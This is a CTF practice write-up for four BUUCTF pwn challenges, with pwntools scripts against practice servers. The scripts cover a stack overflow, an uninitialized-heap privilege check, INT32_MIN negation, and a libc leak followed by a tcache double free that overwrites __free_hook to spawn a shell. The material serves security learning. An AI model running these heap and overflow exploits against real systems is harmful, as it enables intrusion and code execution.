PWN-PRACTICE-BUUCTF-26
- 护网杯_2018_gettingstart
- wustctf2020_number_game
- picoctf_2018_are you root
- ciscn_2019_en_3
护网杯_2018_gettingstart
The read() into buf overflows: overwrite v5 with 0x7FFFFFFFFFFFFFFF and v6 with 0x3FB999999999999A.

```python
from pwn import *

io = remote("node4.buuoj.cn", 29057)
io.recvuntil(b"But Whether it starts depends on you.\n")

# Values that must land in v5 and v6 once buf has been overflowed
v5 = 0x7FFFFFFFFFFFFFFF
v6 = 0x3FB999999999999A  # bit pattern of the double 0.1

# three qwords of padding fill buf, then v5 and v6 are overwritten
payload = p64(0) * 3 + p64(v5) + p64(v6)
io.send(payload)
io.sendline(b"cat flag")
io.interactive()
```

wustctf2020_number_game
neg performs two's complement negation on its operand: it subtracts the operand from zero and writes the result back into the operand.
Two's complement negation can equivalently be expressed as: invert the operand bitwise, then add 1.
Inverting 0x80000000 bitwise and adding 1 yields 0x80000000 again, so sending -2147483648 is enough.
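As an added illustration of the identity above (my own example, not code from the write-up or the challenge): `neg32` computes negation exactly as the neg instruction does, `is_neg_fixed_point` shows that 0x80000000 is its own negation, and `safe_neg32` / `abs32_or` give the guard a program needs before it negates a negative input and trusts the result to be positive. The "negate if negative" pattern is assumed here; the write-up does not show the challenge's source.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Two's complement negation as the x86 neg instruction computes it:
 * 0 - x, equivalently ~x + 1, wrapping modulo 2^32. Unsigned arithmetic
 * keeps the wrap-around well defined in C. */
uint32_t neg32(uint32_t x)
{
    return ~x + 1u;
}

/* True when x is its own negation. Only 0 and 0x80000000 qualify. */
bool is_neg_fixed_point(uint32_t x)
{
    return neg32(x) == x;
}

/* Negate a signed 32-bit value, refusing INT32_MIN (-2147483648),
 * whose negation is not representable and would wrap back to itself. */
bool safe_neg32(int32_t x, int32_t *out)
{
    if (x == INT32_MIN)
        return false;
    *out = -x;
    return true;
}

/* Absolute value with the guard applied: a negative input is negated only
 * when the result can really be positive; otherwise fallback is returned.
 * Without the guard, abs(INT32_MIN) would pass a "result >= 0" check's
 * intent while still being negative. */
int32_t abs32_or(int32_t x, int32_t fallback)
{
    int32_t r;
    if (x >= 0)
        return x;
    return safe_neg32(x, &r) ? r : fallback;
}

int main(void)
{
    printf("neg32(0x80000000) = 0x%08x\n", neg32(0x80000000u));
    printf("abs32_or(INT32_MIN, -1) = %d\n", abs32_or(INT32_MIN, -1));
    return 0;
}
```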
picoctf_2018_are you root
Uninitialized-value check vulnerability; reference: PicoCTF_2018_are_you_root (uninitialized-value check vulnerability)

```python
# -*- coding:utf-8 -*-
from pwn import *

# io = process('./PicoCTF_2018_are_you_root')
io = remote('node4.buuoj.cn', 26285)

def login(name):
    io.sendlineafter(b'>', b'login ' + name)

def reset():
    io.sendlineafter(b'>', b'reset')

def getFlag():
    io.sendlineafter(b'>', b'get-flag')

# The 0x5 written after the 8-byte name stays behind in the freed heap
# memory; the next login reuses that memory without initialising the
# field that is later checked for the privilege level.
login(b'a' * 0x8 + p64(0x5))
reset()
login(b'P1umH0')
getFlag()
io.interactive()
```

ciscn_2019_en_3
puts leaks libc; UAF + double free. Reference: ciscn_2019_en_3 tcache

```python
# -*- coding:utf-8 -*-
from pwn import *

# context.log_level = "debug"
# io = process("./ciscn_2019_en_3")
io = remote("node4.buuoj.cn", 29625)
elf = ELF("./ciscn_2019_en_3")
libc = ELF("./libc-2.27-18-x64.so")

# puts() prints a libc pointer (setbuffer+231) right after the 8-byte ID
io.sendlineafter(b"What's your name?\n", b"P1umH0")
io.sendlineafter(b"Please input your ID.\n", b"a" * 8)
leak = u64(io.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))
setbuffer_addr = leak - 231
libc_base = setbuffer_addr - libc.sym["setbuffer"]
free_hook = libc_base + libc.sym["__free_hook"]
system = libc_base + libc.sym["system"]

def add(size, content):
    io.sendlineafter(b"Input your choice:", b"1")
    io.sendlineafter(b"Please input the size of story: \n", str(size).encode())
    io.sendlineafter(b"please inpute the story: \n", content)

def edit():
    io.sendlineafter(b"Input your choice:", b"2")

def show():
    io.sendlineafter(b"Input your choice:", b"3")

def free(index):
    io.sendlineafter(b"Input your choice:", b"4")
    io.sendlineafter(b"Please input the index:\n", str(index).encode())

def exit():
    io.sendlineafter(b"Input your choice:", b"5")

# gdb.attach(io)
# pause()
add(0x20, b"aaaa")          # index 0
add(0x20, b"/bin/sh\x00")   # index 1

# tcache double free: glibc 2.27 does not detect the same chunk
# being freed twice, so chunk 0 sits in the bin twice
free(0)
free(0)

# first allocation hands back chunk 0; its content becomes the tcache
# next pointer, so the bin now points at __free_hook
add(0x20, p64(free_hook))
add(0x20, b"bbbb")          # second copy of chunk 0
add(0x20, p64(system))      # returns __free_hook, overwritten with system
free(1)                     # free("/bin/sh") -> system("/bin/sh")
io.interactive()
```